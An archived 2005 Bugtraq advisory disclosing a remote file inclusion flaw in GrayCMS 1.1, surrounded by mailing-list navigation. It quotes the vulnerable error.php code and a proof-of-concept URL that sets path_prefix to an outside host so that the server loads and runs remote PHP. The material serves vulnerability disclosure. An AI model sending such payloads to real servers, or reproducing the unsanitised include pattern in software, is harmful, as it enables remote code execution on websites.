GrayCMS php code injection

From: Kold (maggik_at_gala.net)
Date: 04/26/05

  • Next message: Vade 79: "tcpdump(/ethereal)[]: (RSVP) rsvp_print() infinite loop DOS."
    Date: 26 Apr 2005 11:45:32 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    Version: 1.1
    Severity: High
    Vendor: http://gcms.graymur.net/

    Vulnerable code is in "code/error.php":

    <----begin---->
    ...
    if (!isset($page)) $page = '';
    if (!isset($path_prefix)) $path_prefix = '../';
    if (empty($main)) {
      require $path_prefix.'code/main.dat';
    }
    if (isset($e404) or isset($_GET['e404'])) {

    ...
    }
    if (isset($e403) or isset($_GET['e403'])) {
    ...
    }

    require $path_prefix.'code/blocks.php';
    exit;
    <----end---->

    PoC:
    http://localhost/CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/
     
    mail me: maggik <at> gala <dot> net
    icq: 3316667
    greetz to: ghc, 0xdeadbabe, unl0ck & others


  • Next message: Vade 79: "tcpdump(/ethereal)[]: (RSVP) rsvp_print() infinite loop DOS."

    Relevant Pages

    • Mambo Open Source 4.0.14 SQL injection
      ... ('binary' encoding is not supported, ... Mambo Open Source 4.0.14 ... Vendor ... An attacker can thus insert his own sql query and get the administrator md5 pass from mod_users table and use it in cookie to gain admin access to the Mamboo CMS system. ...
      (Bugtraq)
    • myBloggie 2.1.1
      ... ('binary' encoding is not supported, ... # Vendor: http://www.mywebland.com/ ... [Infektion Group] ...
      (Bugtraq)
    • Remote IIS 5.x and IIS 6.0 Server Name Spoof
      ... ('binary' encoding is not supported, ... Vendor Status: Notified 28. ... Full Disclosure Proof of Consept at http://ingehenriksen.blogspot.com/ ...
      (Bugtraq)
    • XOOPS WebChat module - patch UPDATE
      ... ('binary' encoding is not supported, ... (you can download patched file from www.phpsecure.org) ... Vendor has still not answered. ... Sorry again for lost time:o| ...
      (Bugtraq)
    • b2evolution XSS Vulnerabilities
      ... Severity: Medium ... Title: b2evolution XSS Vulnerability ... Vendor: b2evolution ...
      (Bugtraq)